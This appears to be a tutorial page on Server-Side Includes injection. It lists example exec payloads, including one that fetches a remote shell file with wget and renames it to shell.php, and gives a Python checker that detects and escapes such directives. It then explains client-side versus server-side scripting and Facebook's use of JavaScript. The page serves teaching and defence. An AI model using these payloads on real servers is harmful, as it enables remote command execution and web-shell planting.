Server-Side Includes (SSI) Injection

A Server-Side Includes (SSI) injection attack exploits a web application by injecting scripts into HTML pages or executing arbitrary code remotely. It can be carried out by manipulating SSI directives already in use in the application, or by forcing their use through user input fields.
SSIs are directives that web servers use to feed an HTML page with dynamic content.
It is possible to check whether the application properly validates input-field data by inserting the characters used in SSI directives,
such as: < ! # = / . " - > and [a-zA-Z0-9]

Some examples of Server Side Includes are:

List the files in a directory:
<!--#exec cmd="ls" -->

Access a directory:
<!--#exec cmd="cd /root/dir/" -->

Execute a script:
<!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->

Change the error message output:
<!--#config errmsg="File not found, informs users and password"-->

Show the current document's filename:
<!--#echo var="DOCUMENT_NAME" -->

Show the virtual path and filename:
<!--#echo var="DOCUMENT_URI" -->

Using the "config" command and the "timefmt" parameter, control the date and time output format:
<!--#config timefmt="A %B %d %Y %r"-->

Using the "fsize" command, print the size of the selected file:
<!--#fsize file="ssi.shtml" -->
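As an added example (not part of the original page), here is a small Python checker that parses the directive syntax shown above out of user-supplied text, flags the ones that can run a command, and shows the entity encoding that keeps such input from ever being processed as a directive. The sample form submissions and the function names are constructed for this example.

```python
import html
import re

# Directive syntax follows the examples above: <!--#element attr="value" -->
SSI_DIRECTIVE = re.compile(r'<!--#\s*(?P<element>[A-Za-z]+)\s*(?P<attrs>[^>]*?)-->')
SSI_ATTR = re.compile(r'(?P<name>[A-Za-z_]+)\s*=\s*"(?P<value>[^"]*)"')
EXEC_ELEMENTS = {"exec"}  # runs a program on the server; the others read vars/files


def find_ssi_directives(text: str) -> list:
    """Return every SSI directive in text as {"element", "attrs", "raw"}."""
    found = []
    for m in SSI_DIRECTIVE.finditer(text):
        attrs = {a.group("name"): a.group("value")
                 for a in SSI_ATTR.finditer(m.group("attrs"))}
        found.append({"element": m.group("element").lower(),
                      "attrs": attrs, "raw": m.group(0)})
    return found


def classify(text: str) -> str:
    """'exec' if a directive can run a command, 'directive' for any other SSI
    element, 'clean' if none is present (a plain HTML comment lacks the '#')."""
    directives = find_ssi_directives(text)
    if not directives:
        return "clean"
    if any(d["element"] in EXEC_ELEMENTS for d in directives):
        return "exec"
    return "directive"


def neutralize(text: str) -> str:
    """Entity-encode user input before it is written into a page the server
    processes for includes: '<' becomes '&lt;', so '<!--#' never reaches the
    include processor as a directive."""
    return html.escape(text, quote=True)


SAMPLES = [  # constructed sample form submissions (not real traffic)
    "Great article, thanks!",
    'Nice page <!--#exec cmd="ls" -->',
    '<!--#echo var="DOCUMENT_NAME" -->',
    "hello <!-- just an HTML comment --> world",
]

if __name__ == "__main__":
    for text in SAMPLES:
        print(f"{classify(text):9s} {text!r} -> stored as {neutralize(text)!r}")
```

Rejecting or logging anything that classifies as "exec" or "directive", and always storing the neutralized form, covers both the detection and the mitigation side of this attack.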


Scripting -- client side and server side

Server

The server is responsible for serving web pages according to the client's (end user's) request. The pages it serves can be either static or dynamic.

Client

A client is a party that requests pages from the server and displays them to the end user. In general, the client program is a web browser.

Script

A script is a program or sequence of instructions that is interpreted or carried out by another program rather than by the computer processor.

Server Side Scripting

Server-side scripting is used to connect to the databases that reside on the web server, and it can access the file system of the web server. The response from a server-side script is slower than that of a client-side script because the script is processed on the remote computer.

Client Side Scripting

Client-side scripts are programs that execute on the client side, in the web browser, instead of on the server. Upon request, the necessary files are sent to the user's computer by the web server on which they reside.


Advantages of server side scripting

It does not require the user to download a plug-in such as Java or Flash, as client-side scripting may. Your scripts are hidden from view: users only see the HTML output, even when they view the source.

Working of both sides

  • The user opens their web browser (client side)
  • The user starts browsing
  • The client forwards this request to the server to access the requested web page.
  • The server then acknowledges the request and replies to the client program.
    (an access link to that web page)
  • The client then receives the page source and renders it.
    (into a viewable, understandable website)
  • Now the user types into the search bar
  • The client then submits the data to the server
  • The server processes the data and replies with the related search results
  • The client again renders the results for the user to view
  • The user gets access to the requested link.


Scripting and Facebook

Facebook is completely dependent on JavaScript; you can verify this by turning JavaScript off in the browser settings (Settings > Content management).

JavaScript is the only accepted way to do client-side programming in a browser. It is a standard of sorts, accepted by all browser vendors.


Do we need Javascript always to run a web site?

No. The internet (World Wide Web) existed before JavaScript. It ran on plain HTML: documents were linked, and you could navigate through the links.

How does Facebook work with JavaScript disabled?

All major web applications (web sites) are advised to have a fallback mechanism for when JavaScript is disabled. It is among the good practices that should be followed: you never want to disappoint a customer, even if their browser's JavaScript is disabled. It also helps with SEO, since web crawlers cannot crawl through JavaScript.

Not everything on Facebook works when JavaScript is disabled.
You won't see any pop-ups or picture preview modals, and videos open on a different page. The seamless interaction that Facebook offers is replaced by the age-old "click and wait for the response" method.